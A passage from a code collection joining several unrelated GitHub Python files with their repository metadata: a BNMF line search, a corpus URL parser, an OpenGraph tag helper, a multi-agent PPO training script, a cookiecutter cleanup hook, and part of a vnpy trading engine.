BNMF.run(iterations=self.iterations,minimum_TN=minimum_TN)
args = {'metric':'loglikelihood'}
if burn_in is not None and thinning is not None:
args['burn_in'], args['thinning'] = burn_in, thinning
if best_BNMF is None or BNMF.quality(**args) > best_BNMF.quality(**args):
best_BNMF = BNMF
for metric in metrics:
if burn_in is not None and thinning is not None:
quality = best_BNMF.quality(metric,burn_in,thinning)
else:
quality = best_BNMF.quality(metric)
self.all_performances[metric].append(quality)
print "Finished running line search for BNMF."
def all_values(self,metric):
assert metric in metrics, "Unrecognised metric name: %s." % metric
return self.all_performances[metric]
def best_value(self,metric):
assert metric in metrics, "Unrecognised metric name: %s." % metric
return self.values_K[self.all_values(metric).index(min(self.all_values(metric)))] | {
"content_hash": "4f07d2c6825a23e92a63359c9be10a7b",
"timestamp": "",
"source": "github",
"line_count": 89,
"max_line_length": 91,
"avg_line_length": 41.87640449438202,
"alnum_prop": 0.567748859672659,
"repo_name": "ThomasBrouwer/BNMTF",
"id": "22d23e1a78daa3c09758174956d8a0d6c52415a2",
"size": "3727",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "code/cross_validation/line_search_bnmf.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Matlab",
"bytes": "29924"
},
{
"name": "Python",
"bytes": "2751547"
},
{
"name": "R",
"bytes": "41465"
}
],
"symlink_target": ""
} |
from storm.locals import *
from mdcorpus.orm import *
from mdcorpus.parser import *
parser = Parser()
f = open("sample_raw_script_urls.txt")
line = f.readline()
while line:
print "=== parse this line ==="
print line
list = parser.raw_script_urls(line)
script_url = RawScriptUrl(list[-1])
print script_url.url
print ""
line = f.readline()
f.close
| {
"content_hash": "6c814ef43f0d9795871a7d4bc2acb73d",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 39,
"avg_line_length": 20.944444444444443,
"alnum_prop": 0.6578249336870027,
"repo_name": "sosuke-k/cornel-movie-dialogs-corpus-storm",
"id": "ba45f34e58d11b0ef63ac32bbb25f50bf44c092f",
"size": "425",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mdcorpus/examples/parse_raw_script_url.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "29452"
},
{
"name": "Shell",
"bytes": "77"
}
],
"symlink_target": ""
} |
ogp_types = {}
def ogp_type(cls):
type = cls.__name__.lower()
ogp_types[type] = cls()
return cls
class OGP:
def __init__(self, doc):
self.doc = doc
self.prefixes = []
og = doc.meta.namespaces.get('og')
if og:
type = og.get('type')
if type:
self.add_type(type)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if not type and self.prefixes:
prefix = ' '.join(self.prefixes)
self.doc.attr('prefix', prefix)
def add_type(self, type):
prefix = 'og: http://ogp.me/ns#'
if type is not 'website':
bits = type.split('.')
if not self.prefixes:
self.prefixes.append(prefix)
prefix = '{0}: http://ogp.me/ns/{0}#'.format(bits[0])
if prefix not in self.prefixes:
type_handler = ogp_types.get(type)
if type_handler:
self.doc.head.add_meta(property='og:type', content=type)
self.prefixes.append(prefix)
type_handler(self.doc)
class OGPType:
def __call__(self, doc):
pass
def set(self, doc, key, tag_key=None, array=False):
'''Set a key in the doc meta tags
'''
value = doc.meta.namespaces['og'].get(key)
if not value and tag_key:
value = doc.meta.get(tag_key)
if value and array:
value = value.split(', ')
if value:
key = 'og:%s' % key
if not isinstance(value, (tuple, list)):
value = (value,)
if not array:
value = value[:1]
for v in value:
doc.head.add_meta(property=key, content=v)
@ogp_type
class Website(OGPType):
def __call__(self, doc):
self.set(doc, 'url')
self.set(doc, 'title', 'title')
self.set(doc, 'description', 'description')
self.set(doc, 'locale')
self.set(doc, 'site_name')
self.set(doc, 'image', array=True)
@ogp_type
class Profile(Website):
def __call__(self, doc):
super().__call__(doc)
self.set(doc, 'first_name')
self.set(doc, 'last_name')
self.set(doc, 'username')
self.set(doc, 'gender')
@ogp_type
class Article(Website):
def __call__(self, doc):
super().__call__(doc)
self.set(doc, 'published_time')
self.set(doc, 'modified_time')
self.set(doc, 'expiration_time')
self.set(doc, 'author', 'author', array=True)
self.set(doc, 'section')
self.set(doc, 'tag', 'keywords', array=True)
| {
"content_hash": "c205afd2912c6ac43aedbc52419b5d67",
"timestamp": "",
"source": "github",
"line_count": 100,
"max_line_length": 72,
"avg_line_length": 26.76,
"alnum_prop": 0.5115844544095666,
"repo_name": "quantmind/lux",
"id": "ab9b3f50aaf6fca151ff7827d3c24668c1bcad6a",
"size": "2677",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lux/ext/oauth/ogp.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "906"
},
{
"name": "HTML",
"bytes": "5107"
},
{
"name": "JavaScript",
"bytes": "219127"
},
{
"name": "Makefile",
"bytes": "422"
},
{
"name": "Mako",
"bytes": "1050"
},
{
"name": "PLpgSQL",
"bytes": "140"
},
{
"name": "Python",
"bytes": "615221"
},
{
"name": "Shell",
"bytes": "196"
}
],
"symlink_target": ""
} |
"""Binary to run Stable Baselines 3 agents on meltingpot substrates."""
import gym
import stable_baselines3
from stable_baselines3.common import callbacks
from stable_baselines3.common import torch_layers
from stable_baselines3.common import vec_env
import supersuit as ss
import torch
from torch import nn
import torch.nn.functional as F
from examples.pettingzoo import utils
from meltingpot.python import substrate
device = torch.device("cuda") if torch.cuda.is_available() else torch.device(
"cpu")
# Use this with lambda wrapper returning observations only
class CustomCNN(torch_layers.BaseFeaturesExtractor):
"""Class describing a custom feature extractor."""
def __init__(
self,
observation_space: gym.spaces.Box,
features_dim=128,
num_frames=6,
fcnet_hiddens=(1024, 128),
):
"""Construct a custom CNN feature extractor.
Args:
observation_space: the observation space as a gym.Space
features_dim: Number of features extracted. This corresponds to the number
of unit for the last layer.
num_frames: The number of (consecutive) frames to feed into the network.
fcnet_hiddens: Sizes of hidden layers.
"""
super(CustomCNN, self).__init__(observation_space, features_dim)
# We assume CxHxW images (channels first)
# Re-ordering will be done by pre-preprocessing or wrapper
self.conv = nn.Sequential(
nn.Conv2d(
num_frames * 3, num_frames * 3, kernel_size=8, stride=4, padding=0),
nn.ReLU(), # 18 * 21 * 21
nn.Conv2d(
num_frames * 3, num_frames * 6, kernel_size=5, stride=2, padding=0),
nn.ReLU(), # 36 * 9 * 9
nn.Conv2d(
num_frames * 6, num_frames * 6, kernel_size=3, stride=1, padding=0),
nn.ReLU(), # 36 * 7 * 7
nn.Flatten(),
)
flat_out = num_frames * 6 * 7 * 7
self.fc1 = nn.Linear(in_features=flat_out, out_features=fcnet_hiddens[0])
self.fc2 = nn.Linear(
in_features=fcnet_hiddens[0], out_features=fcnet_hiddens[1])
def forward(self, observations) -> torch.Tensor:
# Convert to tensor, rescale to [0, 1], and convert from
# B x H x W x C to B x C x H x W
observations = observations.permute(0, 3, 1, 2)
features = self.conv(observations)
features = F.relu(self.fc1(features))
features = F.relu(self.fc2(features))
return features
def main():
# Config
env_name = "commons_harvest_open"
env_config = substrate.get_config(env_name)
env = utils.parallel_env(env_config)
rollout_len = 1000
total_timesteps = 2000000
num_agents = env.max_num_agents
# Training
num_cpus = 1 # number of cpus
num_envs = 1 # number of parallel multi-agent environments
# number of frames to stack together; use >4 to avoid automatic
# VecTransposeImage
num_frames = 4
# output layer of cnn extractor AND shared layer for policy and value
# functions
features_dim = 128
fcnet_hiddens = [1024, 128] # Two hidden layers for cnn extractor
ent_coef = 0.001 # entropy coefficient in loss
batch_size = (rollout_len * num_envs // 2
) # This is from the rllib baseline implementation
lr = 0.0001
n_epochs = 30
gae_lambda = 1.0
gamma = 0.99
target_kl = 0.01
grad_clip = 40
verbose = 3
model_path = None # Replace this with a saved model
env = utils.parallel_env(
max_cycles=rollout_len,
env_config=env_config,
)
env = ss.observation_lambda_v0(env, lambda x, _: x["RGB"], lambda s: s["RGB"])
env = ss.frame_stack_v1(env, num_frames)
env = ss.pettingzoo_env_to_vec_env_v1(env)
env = ss.concat_vec_envs_v1(
env,
num_vec_envs=num_envs,
num_cpus=num_cpus,
base_class="stable_baselines3")
env = vec_env.VecMonitor(env)
env = vec_env.VecTransposeImage(env, True)
eval_env = utils.parallel_env(
max_cycles=rollout_len,
env_config=env_config,
)
eval_env = ss.observation_lambda_v0(eval_env, lambda x, _: x["RGB"],
lambda s: s["RGB"])
eval_env = ss.frame_stack_v1(eval_env, num_frames)
eval_env = ss.pettingzoo_env_to_vec_env_v1(eval_env)
eval_env = ss.concat_vec_envs_v1(
eval_env, num_vec_envs=1, num_cpus=1, base_class="stable_baselines3")
eval_env = vec_env.VecMonitor(eval_env)
eval_env = vec_env.VecTransposeImage(eval_env, True)
eval_freq = 100000 // (num_envs * num_agents)
policy_kwargs = dict(
features_extractor_class=CustomCNN,
features_extractor_kwargs=dict(
features_dim=features_dim,
num_frames=num_frames,
fcnet_hiddens=fcnet_hiddens,
),
net_arch=[features_dim],
)
tensorboard_log = "./results/sb3/harvest_open_ppo_paramsharing"
model = stable_baselines3.PPO(
"CnnPolicy",
env=env,
learning_rate=lr,
n_steps=rollout_len,
batch_size=batch_size,
n_epochs=n_epochs,
gamma=gamma,
gae_lambda=gae_lambda,
ent_coef=ent_coef,
max_grad_norm=grad_clip,
target_kl=target_kl,
policy_kwargs=policy_kwargs,
tensorboard_log=tensorboard_log,
verbose=verbose,
)
if model_path is not None:
model = stable_baselines3.PPO.load(model_path, env=env)
eval_callback = callbacks.EvalCallback(
eval_env, eval_freq=eval_freq, best_model_save_path=tensorboard_log)
model.learn(total_timesteps=total_timesteps, callback=eval_callback)
logdir = model.logger.dir
model.save(logdir + "/model")
del model
model = stable_baselines3.PPO.load(logdir + "/model") # noqa: F841
if __name__ == "__main__":
main()
| {
"content_hash": "80601800445787b43c859ee1e31e19a5",
"timestamp": "",
"source": "github",
"line_count": 172,
"max_line_length": 80,
"avg_line_length": 32.53488372093023,
"alnum_prop": 0.6561829878484632,
"repo_name": "deepmind/meltingpot",
"id": "8f5d56e7347cf1b503cd3c61f335bf9d1ceed18a",
"size": "6191",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "examples/pettingzoo/sb3_train.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "1732"
},
{
"name": "Lua",
"bytes": "674594"
},
{
"name": "Python",
"bytes": "1768669"
},
{
"name": "Shell",
"bytes": "2923"
}
],
"symlink_target": ""
} |
"""Removed unused files."""
import os
PROJECT_DIRECTORY = os.path.realpath(os.path.curdir)
def remove_file(file_name):
"""Remove file."""
if os.path.exists(file_name):
os.remove(file_name)
if '{{ cookiecutter.use_travis }}'.lower() != 'y':
remove_file(os.path.join(PROJECT_DIRECTORY, '.travis.yml'))
if '{{ cookiecutter.use_aws_codedeploy }}'.lower() != 'y':
remove_file(os.path.join(PROJECT_DIRECTORY, 'appspec.yml'))
| {
"content_hash": "202d416f95feeea8c8029e3694dfc637",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 63,
"avg_line_length": 28,
"alnum_prop": 0.6540178571428571,
"repo_name": "inventivehack/cookiecutter-django-ihk",
"id": "678b05b92f464825d47a2e28871a74cc5b1b1344",
"size": "473",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hooks/post_gen_project.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Nginx",
"bytes": "1194"
},
{
"name": "Python",
"bytes": "7119"
},
{
"name": "Ruby",
"bytes": "571"
},
{
"name": "Shell",
"bytes": "2717"
}
],
"symlink_target": ""
} |
from __future__ import division
import os
import shelve
import logging
from collections import OrderedDict
from datetime import datetime
from copy import copy
from pymongo import MongoClient, ASCENDING
from pymongo.errors import ConnectionFailure
from vnpy.event import Event
from vnpy.trader.vtGlobal import globalSetting
from vnpy.trader.vtEvent import *
from vnpy.trader.vtGateway import *
from vnpy.trader.language import text
from vnpy.trader.vtFunction import getTempPath
########################################################################
class MainEngine(object):
"""主引擎"""
#----------------------------------------------------------------------
def __init__(self, eventEngine):
"""Constructor"""
# 记录今日日期
self.todayDate = datetime.now().strftime('%Y%m%d')
# 绑定事件引擎
self.eventEngine = eventEngine
self.eventEngine.start()
# 创建数据引擎
self.dataEngine = DataEngine(self.eventEngine)
# MongoDB数据库相关
self.dbClient = None # MongoDB客户端对象
# 接口实例
self.gatewayDict = OrderedDict()
self.gatewayDetailList = []
# 应用模块实例
self.appDict = OrderedDict()
self.appDetailList = []
# 风控引擎实例(特殊独立对象)
self.rmEngine = None
# 日志引擎实例
self.logEngine = None
self.initLogEngine()
#----------------------------------------------------------------------
def addGateway(self, gatewayModule):
"""添加底层接口"""
gatewayName = gatewayModule.gatewayName
# 创建接口实例
self.gatewayDict[gatewayName] = gatewayModule.gatewayClass(self.eventEngine,
gatewayName)
# 设置接口轮询
if gatewayModule.gatewayQryEnabled:
self.gatewayDict[gatewayName].setQryEnabled(gatewayModule.gatewayQryEnabled)
# 保存接口详细信息
d = {
'gatewayName': gatewayModule.gatewayName,
'gatewayDisplayName': gatewayModule.gatewayDisplayName,
'gatewayType': gatewayModule.gatewayType
}
self.gatewayDetailList.append(d)
#----------------------------------------------------------------------
def addApp(self, appModule):
"""添加上层应用"""
appName = appModule.appName
# 创建应用实例
self.appDict[appName] = appModule.appEngine(self, self.eventEngine)
# 将应用引擎实例添加到主引擎的属性中
self.__dict__[appName] = self.appDict[appName]
# 保存应用信息
d = {
'appName': appModule.appName,
'appDisplayName': appModule.appDisplayName,
'appWidget': appModule.appWidget,
'appIco': appModule.appIco
}
self.appDetailList.append(d)
#----------------------------------------------------------------------
def getGateway(self, gatewayName):
"""获取接口"""
if gatewayName in self.gatewayDict:
return self.gatewayDict[gatewayName]
else:
self.writeLog(text.GATEWAY_NOT_EXIST.format(gateway=gatewayName))
return None
#----------------------------------------------------------------------
def connect(self, gatewayName):
"""连接特定名称的接口"""
gateway = self.getGateway(gatewayName)
if gateway:
gateway.connect()
# 接口连接后自动执行数据库连接的任务
self.dbConnect()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq, gatewayName):
"""订阅特定接口的行情"""
gateway = self.getGateway(gatewayName)
if gateway:
gateway.subscribe(subscribeReq)
#----------------------------------------------------------------------
def sendOrder(self, orderReq, gatewayName):
"""对特定接口发单"""
# 如果创建了风控引擎,且风控检查失败则不发单
if self.rmEngine and not self.rmEngine.checkRisk(orderReq, gatewayName):
return ''
gateway = self.getGateway(gatewayName)
if gateway:
vtOrderID = gateway.sendOrder(orderReq)
self.dataEngine.updateOrderReq(orderReq, vtOrderID) # 更新发出的委托请求到数据引擎中
return vtOrderID
else:
return ''
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq, gatewayName):
"""对特定接口撤单"""
gateway = self.getGateway(gatewayName)
if gateway:
gateway.cancelOrder(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self, gatewayName):
"""查询特定接口的账户"""
gateway = self.getGateway(gatewayName)
if gateway:
gateway.qryAccount()
#----------------------------------------------------------------------
def qryPosition(self, gatewayName):
"""查询特定接口的持仓"""
gateway = self.getGateway(gatewayName)
if gateway:
gateway.qryPosition()
#----------------------------------------------------------------------
def exit(self):
"""退出程序前调用,保证正常退出"""
# 安全关闭所有接口
for gateway in self.gatewayDict.values():
gateway.close()
# 停止事件引擎
self.eventEngine.stop()
# 停止上层应用引擎
for appEngine in self.appDict.values():
appEngine.stop()
# 保存数据引擎里的合约数据到硬盘
self.dataEngine.saveContracts()
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速发出日志事件"""
log = VtLogData()
log.logContent = content
log.gatewayName = 'MAIN_ENGINE'
event = Event(type_=EVENT_LOG)
event.dict_['data'] = log
self.eventEngine.put(event)
#----------------------------------------------------------------------
def dbConnect(self):
"""连接MongoDB数据库"""
if not self.dbClient:
# 读取MongoDB的设置
try:
# 设置MongoDB操作的超时时间为0.5秒
self.dbClient = MongoClient(globalSetting['mongoHost'], globalSetting['mongoPort'], connectTimeoutMS=500)
# 调用server_info查询服务器状态,防止服务器异常并未连接成功
self.dbClient.server_info()
self.writeLog(text.DATABASE_CONNECTING_COMPLETED)
# 如果启动日志记录,则注册日志事件监听函数
if globalSetting['mongoLogging']:
self.eventEngine.register(EVENT_LOG, self.dbLogging)
except ConnectionFailure:
self.writeLog(text.DATABASE_CONNECTING_FAILED)
#----------------------------------------------------------------------
def dbInsert(self, dbName, collectionName, d):
"""向MongoDB中插入数据,d是具体数据"""
if self.dbClient:
db = self.dbClient[dbName]
collection = db[collectionName]
collection.insert_one(d)
else:
self.writeLog(text.DATA_INSERT_FAILED)
#----------------------------------------------------------------------
def dbQuery(self, dbName, collectionName, d, sortKey='', sortDirection=ASCENDING):
"""从MongoDB中读取数据,d是查询要求,返回的是数据库查询的指针"""
if self.dbClient:
db = self.dbClient[dbName]
collection = db[collectionName]
if sortKey:
cursor = collection.find(d).sort(sortKey, sortDirection) # 对查询出来的数据进行排序
else:
cursor = collection.find(d)
if cursor:
return list(cursor)
else:
return []
else:
self.writeLog(text.DATA_QUERY_FAILED)
return []
#----------------------------------------------------------------------
def dbUpdate(self, dbName, collectionName, d, flt, upsert=False):
"""向MongoDB中更新数据,d是具体数据,flt是过滤条件,upsert代表若无是否要插入"""
if self.dbClient:
db = self.dbClient[dbName]
collection = db[collectionName]
collection.replace_one(flt, d, upsert)
else:
self.writeLog(text.DATA_UPDATE_FAILED)
#----------------------------------------------------------------------
def dbLogging(self, event):
"""向MongoDB中插入日志"""
log = event.dict_['data']
d = {
'content': log.logContent,
'time': log.logTime,
'gateway': log.gatewayName
}
self.dbInsert(LOG_DB_NAME, self.todayDate, d)
#----------------------------------------------------------------------
def getContract(self, vtSymbol):
"""查询合约"""
return self.dataEngine.getContract(vtSymbol)
#----------------------------------------------------------------------
def getAllContracts(self):
"""查询所有合约(返回列表)"""
return self.dataEngine.getAllContracts()
#----------------------------------------------------------------------
def getOrder(self, vtOrderID):
"""查询委托"""
return self.dataEngine.getOrder(vtOrderID)
#----------------------------------------------------------------------
def getPositionDetail(self, vtSymbol):
"""查询持仓细节"""
return self.dataEngine.getPositionDetail(vtSymbol)
#----------------------------------------------------------------------
def getAllWorkingOrders(self):
"""查询所有的活跃的委托(返回列表)"""
return self.dataEngine.getAllWorkingOrders()
#----------------------------------------------------------------------
def getAllOrders(self):
"""查询所有委托"""
return self.dataEngine.getAllOrders()
#----------------------------------------------------------------------
def getAllTrades(self):
"""查询所有成交"""
return self.dataEngine.getAllTrades()
#----------------------------------------------------------------------
def getAllAccounts(self):
"""查询所有账户"""
return self.dataEngine.getAllAccounts()
#----------------------------------------------------------------------
def getAllPositions(self):
"""查询所有持仓"""
return self.dataEngine.getAllPositions()
#----------------------------------------------------------------------
def getAllPositionDetails(self):
"""查询本地持仓缓存细节"""
return self.dataEngine.getAllPositionDetails()
#----------------------------------------------------------------------
def getAllGatewayDetails(self):
"""查询引擎中所有底层接口的信息"""
return self.gatewayDetailList
#----------------------------------------------------------------------
def getAllAppDetails(self):
"""查询引擎中所有上层应用的信息"""
return self.appDetailList
#----------------------------------------------------------------------
def getApp(self, appName):
"""获取APP引擎对象"""
return self.appDict[appName]
#----------------------------------------------------------------------
def initLogEngine(self):
"""初始化日志引擎"""
if not globalSetting["logActive"]:
return
# 创建引擎
self.logEngine = LogEngine()
# 设置日志级别
levelDict = {
"debug": LogEngine.LEVEL_DEBUG,
"info": LogEngine.LEVEL_INFO,
"warn": LogEngine.LEVEL_WARN,
"error": LogEngine.LEVEL_ERROR,
"critical": LogEngine.LEVEL_CRITICAL,
}
level = levelDict.get(globalSetting["logLevel"], LogEngine.LEVEL_CRITICAL)
self.logEngine.setLogLevel(level)
# 设置输出
if globalSetting['logConsole']:
self.logEngine.addConsoleHandler()
if globalSetting['logFile']:
self.logEngine.addFileHandler()
# 注册事件监听
self.registerLogEvent(EVENT_LOG)
#----------------------------------------------------------------------
def registerLogEvent(self, eventType):
"""注册日志事件监听"""
if self.logEngine:
self.eventEngine.register(eventType, self.logEngine.processLogEvent)
#----------------------------------------------------------------------
def convertOrderReq(self, req):
"""转换委托请求"""
return self.dataEngine.convertOrderReq(req)
#----------------------------------------------------------------------
def getLog(self):
"""查询日志"""
return self.dataEngine.getLog()
#----------------------------------------------------------------------
def getError(self):
"""查询错误"""
return self.dataEngine.getError()
########################################################################
class DataEngine(object):
"""数据引擎"""
contractFileName = 'ContractData.vt'
contractFilePath = getTempPath(contractFileName)
FINISHED_STATUS = [STATUS_ALLTRADED, STATUS_REJECTED, STATUS_CANCELLED]
#----------------------------------------------------------------------
def __init__(self, eventEngine):
"""Constructor"""
self.eventEngine = eventEngine
# 保存数据的字典和列表
self.contractDict = {}
self.orderDict = {}
self.workingOrderDict = {} # 可撤销委托
self.tradeDict = {}
self.accountDict = {}
self.positionDict= {}
self.logList = []
self.errorList = []
# 持仓细节相关
self.detailDict = {} # vtSymbol:PositionDetail
self.tdPenaltyList = globalSetting['tdPenalty'] # 平今手续费惩罚的产品代码列表
# 读取保存在硬盘的合约数据
self.loadContracts()
# 注册事件监听
self.registerEvent()
#----------------------------------------------------------------------
def registerEvent(self):
"""注册事件监听"""
self.eventEngine.register(EVENT_CONTRACT, self.processContractEvent)
self.eventEngine.register(EVENT_ORDER, self.processOrderEvent)
self.eventEngine.register(EVENT_TRADE, self.processTradeEvent)
self.eventEngine.register(EVENT_POSITION, self.processPositionEvent)
self.eventEngine.register(EVENT_ACCOUNT, self.processAccountEvent)
self.eventEngine.register(EVENT_LOG, self.processLogEvent)
self.eventEngine.register(EVENT_ERROR, self.processErrorEvent)
#----------------------------------------------------------------------
def processContractEvent(self, event):
"""处理合约事件"""
contract = event.dict_['data']
self.contractDict[contract.vtSymbol] = contract
self.contractDict[contract.symbol] = contract # 使用常规代码(不包括交易所)可能导致重复
#----------------------------------------------------------------------
def processOrderEvent(self, event):
"""处理委托事件"""
order = event.dict_['data']
self.orderDict[order.vtOrderID] = order
# 如果订单的状态是全部成交或者撤销,则需要从workingOrderDict中移除
if order.status in self.FINISHED_STATUS:
if order.vtOrderID in self.workingOrderDict:
del self.workingOrderDict[order.vtOrderID]
# 否则则更新字典中的数据
else:
self.workingOrderDict[order.vtOrderID] = order
# 更新到持仓细节中
detail = self.getPositionDetail(order.vtSymbol)
detail.updateOrder(order)
#----------------------------------------------------------------------
def processTradeEvent(self, event):
"""处理成交事件"""
trade = event.dict_['data']
self.tradeDict[trade.vtTradeID] = trade
# 更新到持仓细节中
detail = self.getPositionDetail(trade.vtSymbol)
detail.updateTrade(trade)
#----------------------------------------------------------------------
def processPositionEvent(self, event):
"""处理持仓事件"""
pos = event.dict_['data']
self.positionDict[pos.vtPositionName] = pos
# 更新到持仓细节中
detail = self.getPositionDetail(pos.vtSymbol)
detail.updatePosition(pos)
#----------------------------------------------------------------------
def processAccountEvent(self, event):
"""处理账户事件"""
account = event.dict_['data']
self.accountDict[account.vtAccountID] = account
#----------------------------------------------------------------------
def processLogEvent(self, event):
"""处理日志事件"""
log = event.dict_['data']
self.logList.append(log)
#----------------------------------------------------------------------
def processErrorEvent(self, event):
"""处理错误事件"""
error = event.dict_['data']
self.errorList.append(error)
#----------------------------------------------------------------------
def getContract(self, vtSymbol):
"""查询合约对象"""
try:
return self.contractDict[vtSymbol]
except KeyError:
return None
#----------------------------------------------------------------------
def getAllContracts(self):
"""查询所有合约对象(返回列表)"""
return self.contractDict.values()
#----------------------------------------------------------------------
def saveContracts(self):
"""保存所有合约对象到硬盘"""
f = shelve.open(self.contractFilePath)
f['data'] = self.contractDict
f.close()
#----------------------------------------------------------------------
def loadContracts(self):
"""从硬盘读取合约对象"""
f = shelve.open(self.contractFilePath)
if 'data' in f:
d = f['data']
for key, value in d.items():
self.contractDict[key] = value
f.close()
#----------------------------------------------------------------------
def getOrder(self, vtOrderID):
"""查询委托"""
try:
return self.orderDict[vtOrderID]
except KeyError:
return None
#----------------------------------------------------------------------
def getAllWorkingOrders(self):
"""查询所有活动委托(返回列表)"""
return self.workingOrderDict.values()
#----------------------------------------------------------------------
def getAllOrders(self):
"""获取所有委托"""
return self.orderDict.values()
#----------------------------------------------------------------------
def getAllTrades(self):
"""获取所有成交"""
return self.tradeDict.values()
#----------------------------------------------------------------------
def getAllPositions(self):
"""获取所有持仓"""
return self.positionDict.values()
#----------------------------------------------------------------------
def getAllAccounts(self):
"""获取所有资金"""
return self.accountDict.values()
#----------------------------------------------------------------------
def getPositionDetail(self, vtSymbol):
"""查询持仓细节"""
if vtSymbol in self.detailDict:
detail = self.detailDict[vtSymbol]
else:
contract = self.getContract(vtSymbol)
detail = PositionDetail(vtSymbol, contract)
self.detailDict[vtSymbol] = detail
# 设置持仓细节的委托转换模式
contract = self.getContract(vtSymbol)
if contract:
detail.exchange = contract.exchange
# 上期所合约
if contract.exchange == EXCHANGE_SHFE:
detail.mode = detail.MODE_SHFE
# 检查是否有平今惩罚
for productID in self.tdPenaltyList:
if str(productID) in contract.symbol:
detail.mode = detail.MODE_TDPENALTY
return detail
#----------------------------------------------------------------------
def getAllPositionDetails(self):
"""查询所有本地持仓缓存细节"""
return self.detailDict.values()
#----------------------------------------------------------------------
def updateOrderReq(self, req, vtOrderID):
"""委托请求更新"""
vtSymbol = req.vtSymbol
detail = self.getPositionDetail(vtSymbol)
detail.updateOrderReq(req, vtOrderID)
#----------------------------------------------------------------------
def convertOrderReq(self, req):
"""根据规则转换委托请求"""
detail = self.detailDict.get(req.vtSymbol, None)
if not detail:
return [req]
else:
return detail.convertOrderReq(req)
#----------------------------------------------------------------------
def getLog(self):
"""获取日志"""
return self.logList
#----------------------------------------------------------------------
def getError(self):
"""获取错误"""
return self.errorList
########################################################################
class LogEngine(object):
"""日志引擎"""
# 单例模式
__metaclass__ = VtSingleton
# 日志级别
LEVEL_DEBUG = logging.DEBUG
LEVEL_INFO = logging.INFO
LEVEL_WARN = logging.WARN
LEVEL_ERROR = logging.ERROR
LEVEL_CRITICAL = logging.CRITICAL
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.logger = logging.getLogger()
self.formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
self.level = self.LEVEL_CRITICAL
self.consoleHandler = None
self.fileHandler = None
# 添加NullHandler防止无handler的错误输出
nullHandler = logging.NullHandler()
self.logger.addHandler(nullHandler)
# 日志级别函数映射
self.levelFunctionDict = {
self.LEVEL_DEBUG: self.debug,
self.LEVEL_INFO: self.info,
self.LEVEL_WARN: self.warn,
self.LEVEL_ERROR: self.error,
self.LEVEL_CRITICAL: self.critical,
}
#----------------------------------------------------------------------
def setLogLevel(self, level):
"""设置日志级别"""
self.logger.setLevel(level)
self.level = level
#----------------------------------------------------------------------
def addConsoleHandler(self):
"""添加终端输出"""
if not self.consoleHandler:
self.consoleHandler = logging.StreamHandler()
self.consoleHandler.setLevel(self.level)
self.consoleHandler.setFormatter(self.formatter)
self.logger.addHandler(self.consoleHandler)
#----------------------------------------------------------------------
def addFileHandler(self, filename=''):
"""添加文件输出"""
if not self.fileHandler:
if not filename:
filename = 'vt_' + datetime.now().strftime('%Y%m%d') + '.log'
filepath = getTempPath(filename)
self.fileHandler = logging.FileHandler(filepath)
self.fileHandler.setLevel(self.level)
self.fileHandler.setFormatter(self.formatter)
self.logger.addHandler(self.fileHandler)
#----------------------------------------------------------------------
def debug(self, msg):
"""开发时用"""
self.logger.debug(msg)
#----------------------------------------------------------------------
def info(self, msg):
"""正常输出"""
self.logger.info(msg)
#----------------------------------------------------------------------
def warn(self, msg):
"""警告信息"""
self.logger.warn(msg)
#----------------------------------------------------------------------
def error(self, msg):
"""报错输出"""
self.logger.error(msg)
#----------------------------------------------------------------------
def exception(self, msg):
"""报错输出+记录异常信息"""
self.logger.exception(msg)
#----------------------------------------------------------------------
def critical(self, msg):
"""影响程序运行的严重错误"""
self.logger.critical(msg)
#----------------------------------------------------------------------
def processLogEvent(self, event):
"""处理日志事件"""
log = event.dict_['data']
function = self.levelFunctionDict[log.logLevel] # 获取日志级别对应的处理函数
msg = '\t'.join([log.gatewayName, log.logContent])
function(msg)
########################################################################
class PositionDetail(object):
"""本地维护的持仓信息"""
WORKING_STATUS = [STATUS_UNKNOWN, STATUS_NOTTRADED, STATUS_PARTTRADED]
MODE_NORMAL = 'normal' # 普通模式
MODE_SHFE = 'shfe' # 上期所今昨分别平仓
MODE_TDPENALTY = 'tdpenalty' # 平今惩罚
#----------------------------------------------------------------------
def __init__(self, vtSymbol, contract=None):
"""Constructor"""
self.vtSymbol = vtSymbol
self.symbol = EMPTY_STRING
self.exchange = EMPTY_STRING
self.name = EMPTY_UNICODE
self.size = 1
if contract:
self.symbol = contract.symbol
self.exchange = contract.exchange
self.name = contract.name
self.size = contract.size
self.longPos = EMPTY_INT
self.longYd = EMPTY_INT
self.longTd = EMPTY_INT
self.longPosFrozen = EMPTY_INT
self.longYdFrozen = EMPTY_INT
self.longTdFrozen = EMPTY_INT
self.longPnl = EMPTY_FLOAT
self.longPrice = EMPTY_FLOAT
self.shortPos = EMPTY_INT
self.shortYd = EMPTY_INT
self.shortTd = EMPTY_INT
self.shortPosFrozen = EMPTY_INT
self.shortYdFrozen = EMPTY_INT
self.shortTdFrozen = EMPTY_INT
self.shortPnl = EMPTY_FLOAT
self.shortPrice = EMPTY_FLOAT
self.lastPrice = EMPTY_FLOAT
self.mode = self.MODE_NORMAL
self.exchange = EMPTY_STRING
self.workingOrderDict = {}
#----------------------------------------------------------------------
def updateTrade(self, trade):
"""成交更新"""
# 多头
if trade.direction is DIRECTION_LONG:
# 开仓
if trade.offset is OFFSET_OPEN:
self.longTd += trade.volume
# 平今
elif trade.offset is OFFSET_CLOSETODAY:
self.shortTd -= trade.volume
# 平昨
